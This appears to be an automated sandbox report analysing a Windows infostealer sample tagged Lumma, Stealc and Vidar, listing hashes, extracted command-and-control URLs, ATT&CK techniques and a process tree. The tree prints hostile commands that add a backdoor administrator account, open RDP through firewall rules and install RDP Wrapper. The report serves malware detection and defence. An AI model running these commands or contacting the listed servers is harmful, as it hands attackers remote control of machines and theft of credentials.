lumma | 8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616

Analysis

max time kernel
99s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
27-09-2024 01:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe
Size

326KB
MD5

10b1172549949f835f59bd598cfc4318
SHA1

21f16130980717888dea8eb3dee30a4914749880
SHA256

8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616
SHA512

ed65fe280393853b9c38bb4d3f19c5b9187d2d7edb33eaf7c2f64e153ea3baefd33b0479a9f10d35dedb9f59ad3dd7f08e35e8106abb650d8cbb18d2dde9796f
SSDEEP

6144:UPT+g0SUUOll/PbH2sY+iF6smfR3B5RlS4rJDuHbSt8OIikiIRi3EO:STH0SIbbnY+iZyxzHd1DRSiLEO

Score

10^/10

lumma stealc vidar default e90840a846d017e7b095f7543cdf2d15 credential_access discovery evasion persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

stealc

Botnet

default

http://46.8.231.109

Attributes

url_path
/c4754d4f680ead72.php

Extracted

Family

vidar

Version

Botnet

e90840a846d017e7b095f7543cdf2d15

https://steamcommunity.com/profiles/76561199780418869

https://t.me/ae5ed

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Extracted

Family

lumma

https://reinforcenh.shop/api

https://stogeneratmns.shop/api

https://fragnantbui.shop/api

https://drawzhotdog.shop/api

https://vozmeatillu.shop/api

https://offensivedzvju.shop/api

https://ghostreedmnu.shop/api

https://gutterydhowi.shop/api

https://wallkedsleeoi.shop/api

Extracted

Family

lumma

https://wallkedsleeoi.shop/api

https://gutterydhowi.shop/api

https://ghostreedmnu.shop/api

https://offensivedzvju.shop/api

https://vozmeatillu.shop/api

https://drawzhotdog.shop/api

https://fragnantbui.shop/api

https://stogeneratmns.shop/api

https://reinforcenh.shop/api

https://ballotnwu.site/api

Signatures

Detect Vidar Stealer 7 IoCs

stealer

resource	yara_rule
behavioral2/memory/1796-99-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/1796-97-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/1796-95-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/1796-130-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/1796-135-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/1796-150-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/1796-153-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
752	netsh.exe
2080	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	RegAsm.exe

Executes dropped EXE 4 IoCs

pid	Process
972	AdminIJKKKFCFHC.exe
4348	AdminHJDHCFCBGI.exe
1284	AdminDGHJEHJJDA.exe
3080	RDPWInst.exe

Loads dropped DLL 3 IoCs

pid	Process
2072	RegAsm.exe
2072	RegAsm.exe
4196	svchost.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
91	api.ipify.org

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1748 set thread context of 2072	1748	8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe	83
PID 972 set thread context of 1796	972	AdminIJKKKFCFHC.exe	92
PID 4348 set thread context of 1156	4348	AdminHJDHCFCBGI.exe	99

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdminDGHJEHJJDA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdminHJDHCFCBGI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdminIJKKKFCFHC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2072	RegAsm.exe
2072	RegAsm.exe
2072	RegAsm.exe
2072	RegAsm.exe
1796	RegAsm.exe
1796	RegAsm.exe
1796	RegAsm.exe
1796	RegAsm.exe
4196	svchost.exe
4196	svchost.exe
4196	svchost.exe
4196	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1284	AdminDGHJEHJJDA.exe
Token: SeDebugPrivilege	3080	RDPWInst.exe
Token: SeAuditPrivilege	4196	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1748 wrote to memory of 2072	1748	8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe	83
PID 1748 wrote to memory of 2072	1748	8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe	83
PID 1748 wrote to memory of 2072	1748	8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe	83
PID 1748 wrote to memory of 2072	1748	8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe	83
PID 1748 wrote to memory of 2072	1748	8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe	83
PID 1748 wrote to memory of 2072	1748	8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe	83
PID 1748 wrote to memory of 2072	1748	8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe	83
PID 1748 wrote to memory of 2072	1748	8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe	83
PID 1748 wrote to memory of 2072	1748	8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe	83
PID 2072 wrote to memory of 2176	2072	RegAsm.exe	84
PID 2072 wrote to memory of 2176	2072	RegAsm.exe	84
PID 2072 wrote to memory of 2176	2072	RegAsm.exe	84
PID 2176 wrote to memory of 972	2176	cmd.exe	86
PID 2176 wrote to memory of 972	2176	cmd.exe	86
PID 2176 wrote to memory of 972	2176	cmd.exe	86
PID 2072 wrote to memory of 436	2072	RegAsm.exe	88
PID 2072 wrote to memory of 436	2072	RegAsm.exe	88
PID 2072 wrote to memory of 436	2072	RegAsm.exe	88
PID 2072 wrote to memory of 1380	2072	RegAsm.exe	90
PID 2072 wrote to memory of 1380	2072	RegAsm.exe	90
PID 2072 wrote to memory of 1380	2072	RegAsm.exe	90
PID 972 wrote to memory of 1796	972	AdminIJKKKFCFHC.exe	92
PID 972 wrote to memory of 1796	972	AdminIJKKKFCFHC.exe	92
PID 972 wrote to memory of 1796	972	AdminIJKKKFCFHC.exe	92
PID 972 wrote to memory of 1796	972	AdminIJKKKFCFHC.exe	92
PID 972 wrote to memory of 1796	972	AdminIJKKKFCFHC.exe	92
PID 972 wrote to memory of 1796	972	AdminIJKKKFCFHC.exe	92
PID 972 wrote to memory of 1796	972	AdminIJKKKFCFHC.exe	92
PID 972 wrote to memory of 1796	972	AdminIJKKKFCFHC.exe	92
PID 972 wrote to memory of 1796	972	AdminIJKKKFCFHC.exe	92
PID 972 wrote to memory of 1796	972	AdminIJKKKFCFHC.exe	92
PID 436 wrote to memory of 4348	436	cmd.exe	93
PID 436 wrote to memory of 4348	436	cmd.exe	93
PID 436 wrote to memory of 4348	436	cmd.exe	93
PID 1380 wrote to memory of 1284	1380	cmd.exe	95
PID 1380 wrote to memory of 1284	1380	cmd.exe	95
PID 1380 wrote to memory of 1284	1380	cmd.exe	95
PID 1284 wrote to memory of 3808	1284	AdminDGHJEHJJDA.exe	96
PID 1284 wrote to memory of 3808	1284	AdminDGHJEHJJDA.exe	96
PID 1284 wrote to memory of 3808	1284	AdminDGHJEHJJDA.exe	96
PID 4348 wrote to memory of 4848	4348	AdminHJDHCFCBGI.exe	98
PID 4348 wrote to memory of 4848	4348	AdminHJDHCFCBGI.exe	98
PID 4348 wrote to memory of 4848	4348	AdminHJDHCFCBGI.exe	98
PID 4348 wrote to memory of 1156	4348	AdminHJDHCFCBGI.exe	99
PID 4348 wrote to memory of 1156	4348	AdminHJDHCFCBGI.exe	99
PID 4348 wrote to memory of 1156	4348	AdminHJDHCFCBGI.exe	99
PID 4348 wrote to memory of 1156	4348	AdminHJDHCFCBGI.exe	99
PID 4348 wrote to memory of 1156	4348	AdminHJDHCFCBGI.exe	99
PID 4348 wrote to memory of 1156	4348	AdminHJDHCFCBGI.exe	99
PID 4348 wrote to memory of 1156	4348	AdminHJDHCFCBGI.exe	99
PID 4348 wrote to memory of 1156	4348	AdminHJDHCFCBGI.exe	99
PID 4348 wrote to memory of 1156	4348	AdminHJDHCFCBGI.exe	99
PID 3808 wrote to memory of 940	3808	cmd.exe	100
PID 3808 wrote to memory of 940	3808	cmd.exe	100
PID 3808 wrote to memory of 940	3808	cmd.exe	100
PID 940 wrote to memory of 724	940	net.exe	101
PID 940 wrote to memory of 724	940	net.exe	101
PID 940 wrote to memory of 724	940	net.exe	101
PID 1284 wrote to memory of 1932	1284	AdminDGHJEHJJDA.exe	102
PID 1284 wrote to memory of 1932	1284	AdminDGHJEHJJDA.exe	102
PID 1284 wrote to memory of 1932	1284	AdminDGHJEHJJDA.exe	102
PID 1932 wrote to memory of 3080	1932	cmd.exe	104
PID 1932 wrote to memory of 3080	1932	cmd.exe	104
PID 1932 wrote to memory of 3080	1932	cmd.exe	104

C:\Users\Admin\AppData\Local\Temp\8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe
"C:\Users\Admin\AppData\Local\Temp\8df76c9722b5a44e7e5c42de48f4073ef42eaa814903207abdb9aa72f0ed4616.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1748
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2072
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminIJKKKFCFHC.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2176
  - - C:\Users\AdminIJKKKFCFHC.exe
      "C:\Users\AdminIJKKKFCFHC.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:972
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1796
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminHJDHCFCBGI.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Users\AdminHJDHCFCBGI.exe
      "C:\Users\AdminHJDHCFCBGI.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4348
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:4848
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1156
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminDGHJEHJJDA.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1380
  - - C:\Users\AdminDGHJEHJJDA.exe
      "C:\Users\AdminDGHJEHJJDA.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1284
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c net user
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3808
      - C:\Windows\SysWOW64\net.exe
        
        net user
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:940
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:724
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe" -i
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1932
      - C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe
        
        C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe -i
        6⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3080
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:752
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c net user RDPUser_34c45392 iOLCyhGfoAn9 /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2116
      - C:\Windows\SysWOW64\net.exe
        
        net user RDPUser_34c45392 iOLCyhGfoAn9 /add
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4708
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user RDPUser_34c45392 iOLCyhGfoAn9 /add
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4912
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c net localgroup
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4008
      - C:\Windows\SysWOW64\net.exe
        
        net localgroup
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2024
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4612
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:636
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2080
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c net localgroup "Administrators" RDPUser_34c45392 /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1876
      - C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" RDPUser_34c45392 /add
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1380
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" RDPUser_34c45392 /add
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1092

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:5032

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4196

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\AdminDGHJEHJJDA.exe

Filesize
72KB

MD5
3fcbaacca9cc6dccf0649f5abb8b73eb

SHA1
b0c5d6768b041c992db13adbf9d1152eae2dcfe4

SHA256
a50e7f2b8528539d7f9eee179010f35c20ad3854e773e40a98023d594113653a

SHA512
055313b85862f58573a589785b3d6a63ff41b105fd78bd7956dff7ec532075cc03954ae492f50562ed5faa6850656570a22552c75a5e47ea768ced8893768ac6

Download Submit
C:\Users\AdminHJDHCFCBGI.exe

Filesize
376KB

MD5
47697a60a96c5adef362d8da9a274b7d

SHA1
16dbc512f121c27e2cb48a61d6dcf166aa792e0d

SHA256
63d86693917598df88d518c057c7680b5bd2de9add384425f81ead95eee18dba

SHA512
4f18db753fbd9f08842630dd2ac97dc6b368269c80dfc8a2f880baa80010db013c8168a6c19465f5d843ae135b162a63eb2dc1c48ea93c5b255868c77c591a17

Download Submit
C:\Users\AdminIJKKKFCFHC.exe

Filesize
403KB

MD5
f73186df5a030cf7f186b0737c3af1f7

SHA1
d15e45feefbbc010db92ae897d80bc7419c0d046

SHA256
05c67a9765fe1ebebcedaee376f87a803d7cd37e6c5c19f7d336c2f14a4ef207

SHA512
a6e4d6e34748fa8fb9153e2104cf49cc36af9b22e29c8df050de0db4e14e9dd18ed178b4bbacd6289a0a55b465c996fb931799ba970dfe559c85215db7e31df1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe

Filesize
1.7MB

MD5
c213162c86bb943bcdf91b3df381d2f6

SHA1
8ec200e2d836354a62f16cdb3eed4bb760165425

SHA256
ac91b2a2db1909a2c166e243391846ad8d9ede2c6fcfd33b60acf599e48f9afc

SHA512
b3ead28bb1f4b87b0c36c129864a8af34fc11e5e9feaa047d4ca0525bec379d07c8efee259ede8832b65b3c03ef4396c9202989249199f7037d56439187f147b

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
433KB

MD5
92bc5fedb559357aa69d516a628f45dc

SHA1
6468a9fa0271724e70243eab49d200f457d3d554

SHA256
85cd5cd634fa8bbbf8d71b0a7d49a58870ef760da6d6e7789452cae4cab28127

SHA512
87e210e22631c1a394918859213140a7c54b75aec9bbc4f44509959d15cfa14abcbfeb1adf9cffa11b2e88f84a8708f67e842d859e63394b7f6036ce934c3cc9

Download Submit
memory/972-90-0x0000000072CEE000-0x0000000072CEF000-memory.dmp

Filesize
4KB

Download
memory/972-91-0x0000000000960000-0x00000000009C8000-memory.dmp

Filesize
416KB

Download
memory/1156-117-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/1156-119-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/1156-115-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/1284-111-0x00000000000A0000-0x00000000000B8000-memory.dmp

Filesize
96KB

Download
memory/1284-113-0x00000000048D0000-0x00000000048E8000-memory.dmp

Filesize
96KB

Download
memory/1284-156-0x0000000005C80000-0x0000000005CE6000-memory.dmp

Filesize
408KB

Download
memory/1748-134-0x0000000074B40000-0x00000000752F0000-memory.dmp

Filesize
7.7MB

Download
memory/1748-1-0x0000000000190000-0x00000000001E6000-memory.dmp

Filesize
344KB

Download
memory/1748-7-0x0000000074B40000-0x00000000752F0000-memory.dmp

Filesize
7.7MB

Download
memory/1748-0-0x0000000074B4E000-0x0000000074B4F000-memory.dmp

Filesize
4KB

Download
memory/1796-137-0x00000000201E0000-0x000000002043F000-memory.dmp

Filesize
2.4MB

Download
memory/1796-95-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
memory/1796-97-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
memory/1796-99-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
memory/1796-153-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
memory/1796-130-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
memory/1796-150-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
memory/1796-135-0x0000000000400000-0x0000000000676000-memory.dmp

Filesize
2.5MB

Download
